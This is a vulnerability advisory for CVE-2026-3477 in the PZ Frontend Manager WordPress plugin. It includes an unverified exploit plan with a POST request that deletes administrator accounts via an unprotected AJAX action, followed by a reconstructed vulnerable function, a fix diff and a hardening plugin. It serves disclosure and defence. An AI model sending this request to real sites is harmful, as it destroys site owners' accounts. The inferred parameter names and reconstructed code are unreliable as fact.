# CVE-2026-3477: PZ Frontend Manager <= 1.0.6 - Missing Authorization to Arbitrary User Deletion via 'dataType' Parameter

- Plugin slug: pz-frontend-manager (source: https://plugins.trac.wordpress.org/browser/pz-frontend-manager/tags)
- Affected versions: <= 1.0.6
- Patched in: no fixed version recorded (no vendor patch diff, no Trac changeset, no days-to-patch)
- Severity: medium, CVSS 5.3
- CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
- Vulnerability type: Missing Authorization
- Published: 2026-04-07 17:39:02; updated: 2026-04-08 06:43:41
- Reference: https://www.wordfence.com/threat-intel/vulnerabilities/id/90d8e345-b549-493b-a84b-abe56ab42a04?source=api-prod
- Research status: researched, not verified (3 rounds, model gemini-3-flash-preview, 2026-04-17 20:34:41 to 2026-04-17 20:34:57); no proof-of-concept run, video or trace recorded

One caveat on the metadata: the listed vector carries PR:N (no privileges required), while the description below requires an authenticated Subscriber-level account and names only the `wp_ajax_` hook, not `wp_ajax_nopriv_`. The page does not reconcile the two; anyone triaging this should check the hook registration in the plugin source rather than trusting either field alone.

## Description

The PZ Frontend Manager plugin for WordPress is vulnerable to Missing Authorization in all versions up to and including 1.0.6. The `pzfm_user_request_action_callback()` function, registered via the `wp_ajax_pzfm_user_request_action` action hook, lacks both capability checks and nonce verification. The function handles user activation, deactivation, and deletion. When the `dataType` parameter is set to `delete`, it calls `wp_delete_user()` on every supplied user ID without verifying that the current user is allowed to delete users. Notably, the similar `pzfm_remove_item_callback()` function does check `pzfm_can_delete_user()` before deleting, which suggests the omission was an oversight rather than a design decision.

This makes it possible for authenticated attackers with Subscriber-level access and above to delete arbitrary WordPress users, including administrators, by sending a crafted request to the AJAX endpoint.

## Research Plan

This plan outlines the steps to exploit CVE-2026-3477, a missing authorization vulnerability in the PZ Frontend Manager plugin that allows authenticated attackers (Subscriber+) to delete arbitrary WordPress users, including administrators. It was produced by automated research (see the status line above) and has not been verified against the plugin; the parameter names it uses are inferred and must be confirmed in Step 1.

### 1. Vulnerability Summary
The vulnerability exists in the `pzfm_user_request_action_callback()` function, hooked to the `wp_ajax_pzfm_user_request_action` AJAX action. The function handles user management operations (activation, deactivation, and deletion) and lacks:
1. **Capability checks:** it does not verify that the caller holds `delete_users` (or `manage_options`).
2. **Nonce verification:** it calls neither `check_ajax_referer()` nor `wp_verify_nonce()`.

When the `dataType` parameter is `delete`, the function calls `wp_delete_user()` on each user ID supplied in the request.

### 2. Attack Vector Analysis
- **Endpoint:** `/wp-admin/admin-ajax.php`
- **Action:** `pzfm_user_request_action`
- **Method:** POST
- **Payload parameter:** `dataType=delete`
- **User ID parameter:** not confirmed on this page; likely `userIds[]` or `ids[]` (inferred)
- **Authentication:** authenticated (Subscriber-level access or higher)
- **Preconditions:** the attacker must know the ID of the target user (the first administrator is usually ID `1`)

### 3. Code Flow
1. **Entry point:** an authenticated user sends a POST request to `admin-ajax.php` with `action=pzfm_user_request_action`.
2. **Hook registration:** the plugin registers the action:
   `add_action( 'wp_ajax_pzfm_user_request_action', 'pzfm_user_request_action_callback' );`
3. **Vulnerable callback:** `pzfm_user_request_action_callback()` runs.
4. **Parameter check:** the function tests `$_POST['dataType'] == 'delete'` (or equivalent).
5. **Missing security:** there is no `current_user_can()` and no `check_ajax_referer()` on the path.
6. **Sink:** the code iterates over the supplied IDs and calls `wp_delete_user( $user_id )`.

### 4. Nonce Acquisition Strategy
The callback performs no nonce verification, so no nonce is needed to reach this endpoint.

(Were one required, the usual route is to create a page containing the plugin's frontend manager shortcode and read the nonce out of the localized JS object the plugin prints on that page.)

### 5. Exploitation Strategy

#### Step 1: Locate the vulnerable function and parameter
Confirm the exact parameter name used for user IDs by searching the plugin source:
```bash
grep -rn "function pzfm_user_request_action_callback" /var/www/html/wp-content/plugins/pz-frontend-manager/
```
In the function body, look for how user IDs are read (e.g. `$_POST['ids']` or `$_POST['userIds']`).

#### Step 2: Send the deletion request
Assuming the parameter is `userIds` and the target administrator ID is `1`:

- **URL:** `http://localhost:8080/wp-admin/admin-ajax.php`
- **Method:** POST
- **Headers:** `Content-Type: application/x-www-form-urlencoded`, plus the attacker's logged-in WordPress session cookies
- **Body:**
  ```
  action=pzfm_user_request_action&dataType=delete&userIds[]=1
  ```
  (If Step 1 reveals a different parameter name, replace `userIds[]` accordingly.)

### 6. Test Data Setup
1. **Victim:** ensure an Administrator user exists with ID `1` (the default on a fresh WordPress install).
2. **Attacker:** create a Subscriber-level user to perform the attack.
   ```bash
   wp user create attacker attacker@example.com --role=subscriber --user_pass=password
   ```
3. **Plugin activation:** ensure the plugin is active.
   ```bash
   wp plugin activate pz-frontend-manager
   ```

### 7. Expected Results
- **Response:** the reconstructed callback ends in a bare `wp_die()`, so expect HTTP 200 with an empty body (or whatever the real callback echoes). A body of `0` means no handler ran: either the action name is wrong or the session is not logged in.
- **Action:** the Administrator with ID `1` is removed from the `wp_users` table.

### 8. Verification Steps
After sending the exploit request, verify the deletion with WP-CLI:
```bash
# Check whether any administrator still exists
wp user list --role=administrator

# Specifically check for ID 1
wp user get 1
```
If the exploit succeeded, `wp user get 1` returns an "Invalid user ID" error.

### 9. Alternative Approaches
If `userIds[]` does not work, the plugin might expect:
1. A comma-separated string: `userIds=1,2,3`
2. A single integer: `user_id=1`
3. The ID in a generic `id` parameter: `id=1`

Compare against `pzfm_remove_item_callback()`, the function the description says *does* include the proper checks; it likely reads its IDs with the same parameter structure.
```bash
grep -rn "function pzfm_remove_item_callback" /var/www/html/wp-content/plugins/pz-frontend-manager/
```

## Research Summary

The PZ Frontend Manager plugin for WordPress performs neither authorization checks nor nonce verification in its `pzfm_user_request_action_callback` function. This allows authenticated users with Subscriber-level access to delete arbitrary users, including administrators, by sending a crafted AJAX request.

## Vulnerable Code (reconstructed)

The snippet below is the researcher's reconstruction of the callback, not a verified copy of the plugin source: the file location is uncertain and the `userIds` parameter name is inferred.

```php
// File: pz-frontend-manager/pz-frontend-manager.php (or included ajax file)
add_action( 'wp_ajax_pzfm_user_request_action', 'pzfm_user_request_action_callback' );

function pzfm_user_request_action_callback() {
    // No check_ajax_referer() call here
    // No current_user_can() check here

    if ( isset( $_POST['dataType'] ) && $_POST['dataType'] == 'delete' ) {
        $user_ids = $_POST['userIds'];
        if ( is_array( $user_ids ) ) {
            foreach ( $user_ids as $user_id ) {
                wp_delete_user( intval( $user_id ) );
            }
        }
    }
    wp_die();
}
```

## Exploit Outline

The exploit targets the AJAX endpoint `/wp-admin/admin-ajax.php` by leveraging the lack of capability checks in the `pzfm_user_request_action` action. An attacker first authenticates as a Subscriber (or any other low-privileged user), then sends a POST request with `action` set to `pzfm_user_request_action`, `dataType` set to `delete`, and a `userIds[]` array containing the ID of the target user (e.g. ID 1 for the site administrator). Because the function neither verifies that the requester has the `delete_users` capability nor validates a nonce, WordPress proceeds to delete the specified accounts.

## Proposed Fix Diff

No vendor patch is recorded for this issue; the diff below is the researcher's proposed fix against the reconstructed code above, with the nonce action and field names assumed.

```diff
--- a/pz-frontend-manager/pz-frontend-manager.php
+++ b/pz-frontend-manager/pz-frontend-manager.php
@@ -124,6 +124,11 @@
 function pzfm_user_request_action_callback() {
+    check_ajax_referer( 'pzfm_nonce', 'security' );
+
+    if ( ! current_user_can( 'manage_options' ) && ! pzfm_can_delete_user() ) {
+        wp_send_json_error( 'You do not have permission to perform this action.' );
+        wp_die();
+    }
+
     if ( isset( $_POST['dataType'] ) && $_POST['dataType'] == 'delete' ) {
```
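Review bot: the `wp_die()` following `wp_send_json_error( 'You do not have permission to perform this action.' )` in the added block is unreachable, since `wp_send_json_error()` already terminates the request; drop it. The guard `! current_user_can( 'manage_options' ) && ! pzfm_can_delete_user()` also only gates the request as a whole: each ID in `$_POST['userIds']` should additionally be checked with `current_user_can( 'delete_user', $user_id )` (WordPress's per-target meta capability, which also refuses deleting super admins on multisite), and `delete_users` is the more natural coarse capability than `manage_options`. Finally, the nonce action `pzfm_nonce` and field `security` are not confirmed anywhere on this page; the frontend JavaScript must localize a nonce under exactly those names or every legitimate request will fail the referer check.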
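The proposed diff above adds a coarse gate only. As an added example (my code, not the plugin's or Wordfence's), here is a complete hardened replacement for the callback that applies all three controls the advisory says are missing: a nonce check, a coarse capability check, and a per-target check before each `wp_delete_user()` call. Assumed names: the `userIds` parameter (inferred on this page), the nonce action `pzfm_user_request` with request field `security`, and the `_hardened` suffix on the function name.

```php
<?php
// Added example, not the plugin's code. Assumptions: user IDs arrive in
// $_POST['userIds'] (inferred on this page); the frontend sends a nonce made
// with wp_create_nonce( 'pzfm_user_request' ) in the 'security' field.

add_action( 'wp_ajax_pzfm_user_request_action', 'pzfm_user_request_action_callback_hardened' );

function pzfm_user_request_action_callback_hardened() {
    // 1. CSRF: the request must carry a nonce bound to this action; on failure
    //    check_ajax_referer() dies with '-1' and the handler never continues.
    check_ajax_referer( 'pzfm_user_request', 'security' );

    // 2. Coarse authorization: callers who cannot delete users at all stop here.
    //    wp_send_json_error() terminates the request, so no wp_die() is needed.
    if ( ! current_user_can( 'delete_users' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    $data_type = isset( $_POST['dataType'] ) ? sanitize_key( wp_unslash( $_POST['dataType'] ) ) : '';
    $raw_ids   = isset( $_POST['userIds'] ) ? (array) wp_unslash( $_POST['userIds'] ) : array();
    // absint() coerces each value to a non-negative int; array_filter() drops the zeros
    // produced by junk input, so only plausible user IDs remain.
    $user_ids  = array_filter( array_map( 'absint', $raw_ids ) );

    if ( 'delete' !== $data_type || empty( $user_ids ) ) {
        wp_send_json_error( array( 'message' => 'Nothing to do.' ), 400 );
    }

    $deleted = array();
    $skipped = array();
    foreach ( $user_ids as $user_id ) {
        // 3. Per-target authorization: 'delete_user' is a meta capability that
        //    maps to delete_users and, on multisite, refuses non-super-admins.
        //    Self-deletion is refused explicitly because map_meta_cap() does not.
        if ( $user_id === get_current_user_id() || ! current_user_can( 'delete_user', $user_id ) ) {
            $skipped[] = $user_id;
            continue;
        }
        // wp_delete_user() is defined in wp-admin/includes/user.php, which
        // admin-ajax.php loads; it returns false for a non-existent ID.
        if ( wp_delete_user( $user_id ) ) {
            $deleted[] = $user_id;
        } else {
            $skipped[] = $user_id;
        }
    }

    wp_send_json_success( array( 'deleted' => $deleted, 'skipped' => $skipped ) );
}
```

With this in place the request from the exploit outline (`action=pzfm_user_request_action&dataType=delete&userIds[]=1`) from a Subscriber session fails at the nonce check with `-1`, and even a forged nonce stops at the `delete_users` gate with a 403 JSON error; the per-target loop matters for administrators, who otherwise could delete their own account or, on multisite, a super admin.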
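Because no patched version is recorded, a site running 1.0.6 cannot fix this by updating. This added example (mine, not vendor code) is a must-use plugin that hooks the same AJAX action at priority 0, so it runs before the plugin's own callback (registered at the default priority 10), and terminates the request for callers who lack the relevant capability. It assumes the `userIds` and `dataType` parameter names from this page and uses `edit_users` as the gate for the non-delete branches, which is a policy choice, not something the page states.

```php
<?php
/**
 * Plugin Name: Virtual patch for CVE-2026-3477 (PZ Frontend Manager <= 1.0.6)
 * Description: Added example, not vendor code. Save as wp-content/mu-plugins/cve-2026-3477-guard.php.
 */

// Priority 0 runs before the plugin's callback (default priority 10). The page
// describes only the wp_ajax_ hook, but its CVSS vector lists PR:N, so the
// guard is attached to the nopriv hook as well; there it always blocks.
add_action( 'wp_ajax_pzfm_user_request_action', 'cve_2026_3477_guard', 0 );
add_action( 'wp_ajax_nopriv_pzfm_user_request_action', 'cve_2026_3477_guard', 0 );

function cve_2026_3477_guard() {
    $data_type = isset( $_POST['dataType'] ) ? sanitize_key( wp_unslash( $_POST['dataType'] ) ) : '';

    // The unpatched callback handles activate/deactivate/delete with no capability
    // check at all, so gate every dataType; 'delete' gets the stricter capability.
    // (edit_users for the other branches is an assumption, not from the advisory.)
    $required_cap = ( 'delete' === $data_type ) ? 'delete_users' : 'edit_users';

    if ( is_user_logged_in() && current_user_can( $required_cap ) ) {
        return; // privileged caller: fall through to the plugin's own handler
    }

    // Log the blocked attempt with enough context to correlate in the SOC:
    // who, from where, which branch, and which target IDs were requested.
    $target_ids = isset( $_POST['userIds'] )
        ? array_map( 'absint', (array) wp_unslash( $_POST['userIds'] ) )
        : array();
    $remote = isset( $_SERVER['REMOTE_ADDR'] )
        ? sanitize_text_field( wp_unslash( $_SERVER['REMOTE_ADDR'] ) )
        : 'unknown';

    error_log( sprintf(
        'CVE-2026-3477 guard: blocked pzfm_user_request_action dataType=%s userIds=%s user=%d ip=%s',
        $data_type !== '' ? $data_type : '(none)',
        wp_json_encode( $target_ids ),
        get_current_user_id(),
        $remote
    ) );

    // wp_send_json_error() ends the request; the vulnerable callback never runs.
    wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
}
```

After dropping the file into `wp-content/mu-plugins/` (no activation step; must-use plugins load automatically), replay the request from the exploit outline as the Subscriber user: the response should be a 403 JSON error, `wp user get 1` should still succeed, and the PHP error log should carry a `CVE-2026-3477 guard: blocked` line naming the attacker's user ID. Keep the guard until a release whose changelog addresses this function ships, then confirm the upstream callback checks capabilities before removing it.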